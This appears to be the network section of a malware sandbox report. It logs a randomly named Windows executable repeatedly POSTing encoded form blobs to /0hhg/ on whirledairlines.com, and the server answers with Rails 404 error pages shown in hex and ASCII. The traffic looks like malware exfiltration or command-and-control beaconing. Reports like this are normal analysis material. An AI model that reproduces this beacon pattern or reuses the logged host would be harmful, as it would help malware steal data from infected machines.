                                                                                                    Data Ascii: e thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table t
                                                                                                    May 2, 2024 08:25:52.000727892 CEST1277INData Raw: 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 65 6e 76 5f 64 75 6d 70 27 29 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 68 65 61 64 65 72 3e 0a 20 20 3c 68 31 3e 52
                                                                                                    Data Ascii: return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="container"> <h2>No route matches [POST] &quot;/0hhg&quot;</h2> <p><code>Rails.root: /hover-parked</code></p><div id=
                                                                                                    May 2, 2024 08:25:52.000799894 CEST1277INData Raw: 67 67 65 72 2e 72 62 3a 31 35 3a 69 6e 20 60 63 61 6c 6c 5f 61 70 70 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 33 22 20 68 72 65 66
                                                                                                    Data Ascii: gger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call&#39;</a><br><a class="trace-frames" data-frame-id="4" href="#">activesupport (5.2.6) lib/acti
                                                                                                    May 2, 2024 08:25:52.000978947 CEST1277INData Raw: 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66
                                                                                                    Data Ascii: (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&#39;</a><br><a class="trace-frames" data-fram
                                                                                                    May 2, 2024 08:25:52.001024008 CEST1277INData Raw: 60 62 6c 6f 63 6b 20 69 6e 20 73 70 61 77 6e 5f 74 68 72 65 61 64 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 2f 63 6f 64 65 3e 3c 2f 70 72 65 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 46 75 6c 6c 2d 54 72 61 63
                                                                                                    Data Ascii: `block in spawn_thread&#39;</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-frame-id="0" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/debug_exceptions
                                                                                                    May 2, 2024 08:25:52.001090050 CEST1277INData Raw: 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 72 65 6d 6f 74 65 5f 69 70 2e 72 62 3a 38 31 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61
                                                                                                    Data Ascii: lib/action_dispatch/middleware/remote_ip.rb:81:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call&#39;</a><br><a class="trace-frames" data-frame-id="10" hr
                                                                                                    May 2, 2024 08:25:52.001140118 CEST1277INData Raw: 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 72 62 3a 32 32 38 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65
                                                                                                    Data Ascii: a (4.3.9) lib/puma/configuration.rb:228:in `call&#39;</a><br><a class="trace-frames" data-frame-id="19" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-frames" data-frame-id="20" href="#">puma (4.3.9
                                                                                                    May 2, 2024 08:25:52.106251955 CEST1277INData Raw: 20 20 63 68 61 6e 67 65 53 6f 75 72 63 65 45 78 74 72 61 63 74 28 66 72 61 6d 65 5f 69 64 29 3b 0a 20 20 20 20 20 20 7d 29 3b 0a 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 63 68 61 6e 67 65 53 6f 75 72 63 65 45 78 74 72 61 63 74 28 66 72 61
                                                                                                    Data Ascii: changeSourceExtract(frame_id); }); function changeSourceExtract(frame_id) { var el = document.getElementById('frame-source-' + frame_id); if (currentSource && el) { currentSource.className += " hidden";
                                                                                                    May 2, 2024 08:25:52.106270075 CEST1277INData Raw: 65 6c 70 65 72 3d 27 70 61 74 68 27 3e 0a 20 20 3c 74 64 20 64 61 74 61 2d 72 6f 75 74 65 2d 6e 61 6d 65 3d 27 72 6f 6f 74 27 3e 0a 20 20 20 20 20 20 72 6f 6f 74 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 68 65 6c 70 65 72 27 3e 5f 70 61 74 68 3c 2f
                                                                                                    Data Ascii: elper='path'> <td data-route-name='root'> root<span class='helper'>_path</span> </td> <td> GET </td> <td data-route-path='/'> / </td> <td> <p>main#index</p> </td></tr><tr class='route_row' data-helper='path'


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    14192.168.2.449751216.40.34.4180916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:25:54.663068056 CEST740OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.whirledairlines.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.whirledairlines.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 225
                                                                                                    Referer: http://www.whirledairlines.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 44 43 37 35 77 2f 4f 47 62 54 48 4f 77 56 46 76 53 4e 48 55 4a 75 56 46 49 4d 37 59 4b 35 4f 79 72 50 6f 69 5a 58 69 6c 67 6b 55 59 50 52 41 59 50 4e 37 4f 49 6a 6c 34 78 35 65 56 32 65 63 58 32 75 4a 68 50 67 72 76 2b 41 75 67 6a 41 43 70 73 50 38 6e 53 59 62 36 76 49 49 63 53 59 43 51 32 2f 76 52 6a 71 65 45 41 6e 76 34 71 62 32 47 79 75 75 4e 42 72 73 77 4b 50 58 71 4d 71 71 4e 6a 59 65 45 69 63 4f 45 56 32 6e 72 38 7a 35 4b 2f 6d 32 2f 35 72 5a 75 6b 55 54 45 37 6e 34 2f 36 32 34 44 62 62 57 79 37 36 57 6e 65 6b 62 41 78 74 64 63 6d 70 62 2b 51 6e 73 58 49 34 61 36 4b 61 78 57 65 6f 59 35 66 65 50 62 79 32 72 56 35 73 73 44 32 75 51 3d
                                                                                                    Data Ascii: ABqDW6A8=DC75w/OGbTHOwVFvSNHUJuVFIM7YK5OyrPoiZXilgkUYPRAYPN7OIjl4x5eV2ecX2uJhPgrv+AugjACpsP8nSYb6vIIcSYCQ2/vRjqeEAnv4qb2GyuuNBrswKPXqMqqNjYeEicOEV2nr8z5K/m2/5rZukUTE7n4/624DbbWy76WnekbAxtdcmpb+QnsXI4a6KaxWeoY5fePby2rV5ssD2uQ=
                                                                                                    May 2, 2024 08:25:54.801769972 CEST1277INHTTP/1.1 404 Not Found
                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                    x-request-id: 6be9d13a-2dba-46bd-9c19-b35affe7f6c0
                                                                                                    x-runtime: 0.029447
                                                                                                    content-length: 18207
                                                                                                    connection: close
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                                                                    May 2, 2024 08:25:54.801800966 CEST1277INData Raw: 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20
                                                                                                    Data Ascii: ne; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px solid #D9D9D9; background: #ECECEC;
                                                                                                    May 2, 2024 08:25:54.801814079 CEST1277INData Raw: 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 74 68 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74
                                                                                                    Data Ascii: e thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table t
                                                                                                    May 2, 2024 08:25:54.801875114 CEST1277INData Raw: 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 65 6e 76 5f 64 75 6d 70 27 29 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 68 65 61 64 65 72 3e 0a 20 20 3c 68 31 3e 52
                                                                                                    Data Ascii: return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="container"> <h2>No route matches [POST] &quot;/0hhg&quot;</h2> <p><code>Rails.root: /hover-parked</code></p><div id=
                                                                                                    May 2, 2024 08:25:54.801918983 CEST1277INData Raw: 67 67 65 72 2e 72 62 3a 31 35 3a 69 6e 20 60 63 61 6c 6c 5f 61 70 70 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 33 22 20 68 72 65 66
                                                                                                    Data Ascii: gger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call&#39;</a><br><a class="trace-frames" data-frame-id="4" href="#">activesupport (5.2.6) lib/acti
                                                                                                    May 2, 2024 08:25:54.801984072 CEST1277INData Raw: 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66
                                                                                                    Data Ascii: (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&#39;</a><br><a class="trace-frames" data-fram
                                                                                                    May 2, 2024 08:25:54.801997900 CEST1277INData Raw: 60 62 6c 6f 63 6b 20 69 6e 20 73 70 61 77 6e 5f 74 68 72 65 61 64 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 2f 63 6f 64 65 3e 3c 2f 70 72 65 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 46 75 6c 6c 2d 54 72 61 63
                                                                                                    Data Ascii: `block in spawn_thread&#39;</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-frame-id="0" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/debug_exceptions
                                                                                                    May 2, 2024 08:25:54.802069902 CEST1277INData Raw: 20 6c 69 62 2f 61 63 74 69 6f 6e 5f 64 69 73 70 61 74 63 68 2f 6d 69 64 64 6c 65 77 61 72 65 2f 72 65 6d 6f 74 65 5f 69 70 2e 72 62 3a 38 31 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61
                                                                                                    Data Ascii: lib/action_dispatch/middleware/remote_ip.rb:81:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">request_store (1.5.0) lib/request_store/middleware.rb:19:in `call&#39;</a><br><a class="trace-frames" data-frame-id="10" hr
                                                                                                    May 2, 2024 08:25:54.802138090 CEST1277INData Raw: 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 2e 72 62 3a 32 32 38 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65
                                                                                                    Data Ascii: a (4.3.9) lib/puma/configuration.rb:228:in `call&#39;</a><br><a class="trace-frames" data-frame-id="19" href="#">puma (4.3.9) lib/puma/server.rb:718:in `handle_request&#39;</a><br><a class="trace-frames" data-frame-id="20" href="#">puma (4.3.9
                                                                                                    May 2, 2024 08:25:54.907051086 CEST1277INData Raw: 20 20 63 68 61 6e 67 65 53 6f 75 72 63 65 45 78 74 72 61 63 74 28 66 72 61 6d 65 5f 69 64 29 3b 0a 20 20 20 20 20 20 7d 29 3b 0a 0a 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 63 68 61 6e 67 65 53 6f 75 72 63 65 45 78 74 72 61 63 74 28 66 72 61
                                                                                                    Data Ascii: changeSourceExtract(frame_id); }); function changeSourceExtract(frame_id) { var el = document.getElementById('frame-source-' + frame_id); if (currentSource && el) { currentSource.className += " hidden";
                                                                                                    May 2, 2024 08:25:54.907077074 CEST1277INData Raw: 65 6c 70 65 72 3d 27 70 61 74 68 27 3e 0a 20 20 3c 74 64 20 64 61 74 61 2d 72 6f 75 74 65 2d 6e 61 6d 65 3d 27 72 6f 6f 74 27 3e 0a 20 20 20 20 20 20 72 6f 6f 74 3c 73 70 61 6e 20 63 6c 61 73 73 3d 27 68 65 6c 70 65 72 27 3e 5f 70 61 74 68 3c 2f
                                                                                                    Data Ascii: elper='path'> <td data-route-name='root'> root<span class='helper'>_path</span> </td> <td> GET </td> <td data-route-path='/'> / </td> <td> <p>main#index</p> </td></tr><tr class='route_row' data-helper='path'


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    15192.168.2.449752216.40.34.4180916C:\Program Files (x86)\DUKoqSpezAPdkEeQLfXbQJktRyLdTGIcgkgDcRWuknrvtOsFOYoJLHQwvsoW\jBaxmaKIzqHZYEOPQcTTJTXx.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    May 2, 2024 08:25:57.424808979 CEST1289OUTPOST /0hhg/ HTTP/1.1
                                                                                                    Host: www.whirledairlines.com
                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                    Origin: http://www.whirledairlines.com
                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                    Connection: close
                                                                                                    Cache-Control: max-age=0
                                                                                                    Content-Length: 10305
                                                                                                    Referer: http://www.whirledairlines.com/0hhg/
                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36
                                                                                                    Data Raw: 41 42 71 44 57 36 41 38 3d 44 43 37 35 77 2f 4f 47 62 54 48 4f 77 56 46 76 53 4e 48 55 4a 75 56 46 49 4d 37 59 4b 35 4f 79 72 50 6f 69 5a 58 69 6c 67 6b 63 59 50 44 59 59 4a 76 54 4f 4a 6a 6c 34 37 5a 65 55 32 65 64 46 32 75 68 66 50 67 6d 53 2b 43 6d 67 78 7a 61 70 6f 4e 55 6e 62 59 62 36 77 34 4a 62 57 59 43 2f 32 2f 66 56 6a 75 79 45 41 6e 76 34 71 5a 75 47 69 71 36 4e 4e 4c 73 7a 4e 50 58 32 64 36 71 6c 6a 59 6d 55 69 63 62 2f 41 57 48 72 35 6a 4a 4b 39 55 65 2f 37 4c 5a 6f 6f 30 53 48 37 6e 30 67 36 32 4d 50 62 59 4b 49 37 35 4b 6e 64 45 65 69 32 65 35 36 38 2f 50 63 53 55 34 57 49 36 47 34 54 34 4a 77 52 6f 38 41 63 71 62 72 34 57 61 44 2b 65 67 31 71 62 4f 6f 6c 6c 5a 66 7a 39 67 38 77 56 38 6b 7a 31 45 66 43 4c 39 4b 63 42 64 77 62 67 2b 5a 6f 57 6e 7a 4f 6a 50 74 41 6c 39 33 75 30 32 50 48 64 31 69 34 4c 44 69 67 6d 48 49 32 73 33 76 50 44 33 35 6c 65 31 39 38 33 74 54 53 38 67 73 42 62 6d 75 7a 33 73 68 44 35 62 4b 4e 36 54 37 33 2b 32 4a 4b 70 37 5a 64 78 78 6e 2f 34 4f 33 73 6e 49 37 35 [TRUNCATED]
                                                                                                    Data Ascii: ABqDW6A8=DC75w/OGbTHOwVFvSNHUJuVFIM7YK5OyrPoiZXilgkcYPDYYJvTOJjl47ZeU2edF2uhfPgmS+CmgxzapoNUnbYb6w4JbWYC/2/fVjuyEAnv4qZuGiq6NNLszNPX2d6qljYmUicb/AWHr5jJK9Ue/7LZoo0SH7n0g62MPbYKI75KndEei2e568/PcSU4WI6G4T4JwRo8Acqbr4WaD+eg1qbOollZfz9g8wV8kz1EfCL9KcBdwbg+ZoWnzOjPtAl93u02PHd1i4LDigmHI2s3vPD35le1983tTS8gsBbmuz3shD5bKN6T73+2JKp7Zdxxn/4O3snI75bi8D/23NRdbid0jZsXOa4QQlVSTT6ZNiRaH24x/DUcR00vTo4J/9k2Tzcdm6fWaVsT5pramBRLwQcdJRRpw13TufjgVoDtj5oqMt/zeTT3Gnn0mUXT59MuvMbHTbdAmEhLAZr4yxbMRhKaCCo8iA09qRjExVeBrlRU093kMObY9U5RXtCByYaeRnP5mIdktsD6L7yRjuHQEvJiY0vF3IEznOSJvNpQnTukIeNkXGovnwaG0AhJD6sEaPwsvg+BLbk+tcwTy4wwq8Ji5iPpymKiYiaL7S2jaB8qkEyX3mU6/zR/eCDWBCZv0++MFd42gg3WnD6rb09HAY22ZL4TUABz2ekfXNSP9/4ZumASCx+SJSxdnFFEMUynimb27gxNZbcBq3kjC/TuZf2Uyb61vr634IZB6BS3+DdZJxTeWj5d56qq2BGt
                                                                                                    May 2, 2024 08:25:57.589528084 CEST9533OUTData Raw: 77 4a 68 54 63 72 59 39 45 51 69 2b 46 51 54 37 51 6d 31 6b 2f 62 47 59 5a 31 66 4e 34 48 63 72 32 41 2b 46 30 54 4d 6a 45 43 54 7a 62 57 56 4e 39 6c 6b 5a 31 56 52 41 74 42 6e 78 4b 71 46 67 62 49 53 4e 50 4f 41 6f 2f 54 33 56 69 43 33 76 4a 58
                                                                                                    Data Ascii: wJhTcrY9EQi+FQT7Qm1k/bGYZ1fN4Hcr2A+F0TMjECTzbWVN9lkZ1VRAtBnxKqFgbISNPOAo/T3ViC3vJX0vsZubqepiqN+8lP2qFQoLBp+jA2OUeKlUMS9V81WAtCfafh0gDBIGOHEgTBdQDIHrssg/9uCMHM5dzTBWZ+zmAhC7w9YMCo4PxVjPFAbq+gutOmiDA8+JT+i14NdcMsqngoAZ5WW9I+i+agSU9psM7EJ25msg/nF
                                                                                                    May 2, 2024 08:25:57.722740889 CEST1277INHTTP/1.1 404 Not Found
                                                                                                    content-type: text/html; charset=UTF-8
                                                                                                    x-request-id: 7035b86c-7e22-43c3-90bb-e042de1a7097
                                                                                                    x-runtime: 0.025147
                                                                                                    content-length: 28287
                                                                                                    connection: close
                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 41 63 74 69 6f 6e 20 43 6f 6e 74 72 6f 6c 6c 65 72 3a 20 45 78 63 65 70 74 69 6f 6e 20 63 61 75 67 68 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 46 41 46 41 46 41 3b 0a 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 62 6f 64 79 2c 20 70 2c 20 6f 6c 2c 20 75 6c 2c 20 74 64 20 7b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 68 65 6c 76 65 74 69 63 61 2c 20 76 65 72 64 61 6e 61 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 20 20 31 33 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 [TRUNCATED]
                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
                                                                                                    May 2, 2024 08:25:57.722798109 CEST1277INData Raw: 6e 65 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20
                                                                                                    Data Ascii: ne; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; } .source { border: 1px solid #D9D9D9; background: #ECECEC;
                                                                                                    May 2, 2024 08:25:57.722856045 CEST1277INData Raw: 65 20 74 68 65 61 64 20 74 72 2e 62 6f 74 74 6f 6d 20 74 68 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 35 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 72 6f 75 74 65 5f 74
                                                                                                    Data Ascii: e thead tr.bottom th { padding: 10px 0; line-height: 15px; } #route_table thead tr.bottom th input#search { -webkit-appearance: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table t
                                                                                                    May 2, 2024 08:25:57.722868919 CEST1277INData Raw: 20 20 20 20 20 72 65 74 75 72 6e 20 74 6f 67 67 6c 65 28 27 65 6e 76 5f 64 75 6d 70 27 29 3b 0a 20 20 20 20 7d 0a 20 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 68 65 61 64 65 72 3e 0a 20 20 3c 68 31 3e 52
                                                                                                    Data Ascii: return toggle('env_dump'); } </script></head><body><header> <h1>Routing Error</h1></header><div id="container"> <h2>No route matches [POST] &quot;/0hhg&quot;</h2> <p><code>Rails.root: /hover-parked</code></p><div id=
                                                                                                    May 2, 2024 08:25:57.722943068 CEST1277INData Raw: 67 67 65 72 2e 72 62 3a 31 35 3a 69 6e 20 60 63 61 6c 6c 5f 61 70 70 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 33 22 20 68 72 65 66
                                                                                                    Data Ascii: gger.rb:15:in `call_app&#39;</a><br><a class="trace-frames" data-frame-id="3" href="#">railties (5.2.6) lib/rails/rack/logger.rb:26:in `block in call&#39;</a><br><a class="trace-frames" data-frame-id="4" href="#">activesupport (5.2.6) lib/acti
                                                                                                    May 2, 2024 08:25:57.722958088 CEST1277INData Raw: 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66
                                                                                                    Data Ascii: (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="13" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call&#39;</a><br><a class="trace-frames" data-fram
                                                                                                    May 2, 2024 08:25:57.722969055 CEST1277INData Raw: 60 62 6c 6f 63 6b 20 69 6e 20 73 70 61 77 6e 5f 74 68 72 65 61 64 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 2f 63 6f 64 65 3e 3c 2f 70 72 65 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 46 75 6c 6c 2d 54 72 61 63
                                                                                                    Data Ascii: `block in spawn_thread&#39;</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-frame-id="0" href="#">actionpack (5.2.6) lib/action_dispatch/middleware/debug_exceptions
